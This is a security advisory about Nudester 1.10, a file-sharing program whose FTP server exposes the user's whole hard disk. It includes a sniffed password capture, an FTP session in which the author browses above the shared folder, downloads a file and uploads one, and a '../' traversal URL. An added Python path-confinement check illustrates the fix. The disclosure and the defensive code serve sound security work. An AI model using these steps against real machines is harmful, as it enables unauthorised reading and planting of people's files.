COMMAND

    Nudester

SYSTEMS AFFECTED

    Nudester 1.10

PROBLEM

    The following is based on Real Security Advisory #1 by Cyph3r.
    Nudester, a file sharing program for porn, uses the FTP protocol
    to transfer files.  The problem is that it gives access to the
    whole hard disk instead of just the folder containing porn.

    For example, open Nudester and a sniffer program (like Iris) and
    download a file from a user on Nudester.  Keep the sniffer running
    and filtering on port 21 so that it captures the password.

        <Sniffed Data>

        220 ICS FTP Server ready
        user NUDESTER
        331 Password required for NUDESTER
        pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
        230 User NUDESTER logged in

        </Sniffed Data>

    Open an FTP client and connect to the IP address:

        ftp> open ***.***.***.***
        Connected to ***.***.***.***
        220 ICS FTP Server ready.
        User (***.***.***.***:(none)): NUDESTER
        331 Password required for NUDESTER.
        Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
        230 User NUDESTER logged in.

        - Bingo!

        ftp> dir
        200 Port command successful.
        150 Opening data connection for directory list.
        C:\TEMP\*.* not found
        226 File sent ok
        ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
        ftp> cd ..
        250 CWD command successful. "C:/" is current directory.
        ftp> DIR
        200 Port command successful.
        150 Opening data connection for directory list.
        -rw-rw-rw-   1 ftp      ftp         1152 Oct 30  2000 FRUNLOG.TXT
        -rwxrwxrwx   1 ftp      ftp        25473 May 15  1998 MSCDEX.EXE
        -rw-rw-rw-   1 ftp      ftp        10604 May 15  1997 CDROM.SYS
        -rwxrwxrwx   1 ftp      ftp        20135 May 15  1998 KEYB.COM
        -rw-rw-rw-   1 ftp      ftp        34566 May 15  1998 KEYBOARD.SYS
        -rwxrwxrwx   1 ftp      ftp        71102 May 15  1998 EDIT.COM
        -rw-rw-rw-   1 ftp      ftp           38 Oct 16  1998 AUTOEXEC.OLD
        -rw-rw-rw-   1 ftp      ftp           31 Oct 16  1998 CONFIG.OLD
        drw-rw-rw-   1 ftp      ftp            0 Oct 30  2030 ATI
        -rw-rw-rw-   1 ftp      ftp          121 Oct 29  2000 CONFIG.DOS
        -rw-rw-rw-   1 ftp      ftp          113 Oct 29  2000 AUTOEXEC.DOS
        -rw-rw-rw-   1 ftp      ftp          436 Nov 18  2000 AUTOEXEC.BAK
        drw-rw-rw-   1 ftp      ftp            0 Oct 29  2000 WINDOWS
        drw-rw-rw-   1 ftp      ftp            0 Oct 30  2000 WINDOWS.000
        -rw-rw-rw-   1 ftp      ftp         7471 Nov 18  2000 NETLOG.TXT
        -rw-rw-rw-   1 ftp      ftp          172 Nov 15  2000 CONFIG.BAK
        -rw-rw-rw-   1 ftp      ftp         5048 Nov 17  2000 SETUPXLG.TXT
        -rwxrwxrwx   1 ftp      ftp          438 Aug 16 00:43 AUTOEXEC.BAT
        dr--r--r--   1 ftp      ftp            0 Oct 29  2000 Program Files
        -rw-rw-rw-   1 ftp      ftp          172 Nov 18  2000 CONFIG.SYS
        -rw-rw-rw-   1 ftp      ftp        19622 Aug 10 18:50 SCANDISK.LOG
        -rw-rw-rw-   1 ftp      ftp          327 Oct 30  2030 outreg.txt
        -rw-rw-rw-   1 ftp      ftp          339 Oct 30  2030 outreg.ini
        drw-rw-rw-   1 ftp      ftp            0 Oct 30  2030 dcpt
        -rwxrwxrwx   1 ftp      ftp        17129 Oct 30  2030 BOOTDISK.EXE
        -rwxrwxrwx   1 ftp      ftp      2884286 Oct 30  2030 DECOMP.EXE
        -rwxrwxrwx   1 ftp      ftp       265420 Oct 30  2030 DOS4GW.EXE
        -rw-rw-rw-   1 ftp      ftp          507 Oct 30  2030 FILE_ID.DIZ
        -rw-rw-rw-   1 ftp      ftp         2086 Oct 30  2030 HELPME.DOC
        -rw-rw-rw-   1 ftp      ftp         3639 Oct 30  2030 LICENSE.DOC
        -rw-rw-rw-   1 ftp      ftp         1377 Oct 30  2030 ORDER.DOC
        drw-rw-rw-   1 ftp      ftp            0 Nov 02  2000 KPCMS
        -rw-rw-rw-   1 ftp      ftp          386 Nov 02  2000 AUTOEXEC.001
        drw-rw-rw-   1 ftp      ftp            0 Nov 02  2000 psfonts
        -rw-rw-rw-   1 ftp      ftp           25 Nov 03  2000 prompt
        -rwxrwxrwx   1 ftp      ftp        95874 May 05  1999 COMMAND.COM
        drw-rw-rw-   1 ftp      ftp            0 Nov 19  2000 Winzip
        drw-rw-rw-   1 ftp      ftp            0 Dec 10  2000 unzipped
        drw-rw-rw-   1 ftp      ftp            0 Nov 19  2000 Antivirus
        drw-rw-rw-   1 ftp      ftp            0 Dec 16  2000 My Music
        -rw-rw-rw-   1 ftp      ftp          118 Jan 20 00:27 netsig.txt
        drw-rw-rw-   1 ftp      ftp            0 Mar 15 21:05 accelerator
        -rw-rw-rw-   1 ftp      ftp        22721 Aug 17 01:00 winzip.log
        226 File sent ok
        ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.

    Let's see if we have access to download a file:

        ftp> get netsig.txt
        200 Port command successful.
        150 Opening data connection for netsig.txt.
        226 File sent ok
        ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.

    Yep, let's try to upload a file:

        ftp> put c:\temp.txt
        200 Port command successful.
        150 Opening data connection for TEMP.TXT.
        226 File received ok

    Anyone can gain full access to a Nudester user's files; the
    username is the same for every user.  However, the password is not
    the same, so you will have to sniff while downloading a file to
    retrieve the password.

    You can gain full FTP access without a password.  Just log in to
    the host of the person running Nudester using any login/password
    and there you go.  If you are using IE to browse files you cannot
    directly view other folders.  The workaround is simple:

        ftp://127.0.0.0/../

    will give you C:\ (the directory you start in is c:\temp).  Dunno
    if you can upload files using this method, but you can download
    and view folders/files.  Using an FTP program such as the one that
    comes with Windows will allow full access.
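
    The session above shows the server honouring "cd .." from C:\TEMP
    up to C:/.  The following is an added example, not part of the
    original advisory and not Nudester or ICS code, of the path
    confinement check a sharing FTP server needs before acting on
    CWD, RETR or STOR.  The names SHARE_ROOT, PathEscape, resolve and
    handle_cwd are assumptions made for illustration.

```python
import ntpath

SHARE_ROOT = "C:\\TEMP"  # assumed share folder; the advisory's session starts here


class PathEscape(Exception):
    """The requested path resolves outside the shared folder."""


def resolve(share_root, cwd, requested):
    """Map a client-supplied FTP path to (virtual_path, real_path).

    cwd is the session's virtual directory, where "/" means share_root.
    Raises PathEscape instead of ever walking above share_root.
    """
    requested = requested.replace("\\", "/")  # clients send either separator
    # Drive letters, UNC prefixes and NTFS stream syntax are never valid here.
    if ":" in requested or ntpath.splitdrive(requested)[0]:
        raise PathEscape(requested)
    # Absolute paths restart at the virtual root, relative ones at cwd.
    parts = [] if requested.startswith("/") else [p for p in cwd.split("/") if p]
    for part in requested.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not parts:  # ".." at the virtual root: the C:\TEMP -> C:/ step
                raise PathEscape(requested)
            parts.pop()
        elif part.rstrip(". ") != part:
            # Win32 path normalisation can strip trailing dots and spaces.
            raise PathEscape(requested)
        else:
            parts.append(part)
    real = ntpath.normpath(ntpath.join(share_root, *parts))
    # Defence in depth: the joined path must still sit under share_root.
    root = ntpath.normcase(ntpath.normpath(share_root))
    if ntpath.commonpath([root, ntpath.normcase(real)]) != root:
        raise PathEscape(requested)
    return "/" + "/".join(parts), real


def handle_cwd(cwd, arg, share_root=SHARE_ROOT):
    """Return (new_cwd, reply) for a CWD command; cwd is unchanged on refusal."""
    try:
        virtual, _ = resolve(share_root, cwd, arg)
    except PathEscape:
        return cwd, "550 Requested action not taken."
    return virtual, '250 CWD command successful. "%s" is current directory.' % virtual
```

    The check is purely lexical; a server that allows junctions or
    other links inside the share must also compare the resolved real
    path against the share root before opening the file.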

SOLUTION

    The only solution to this problem is not to use Nudester.  And
    find yourself a girl.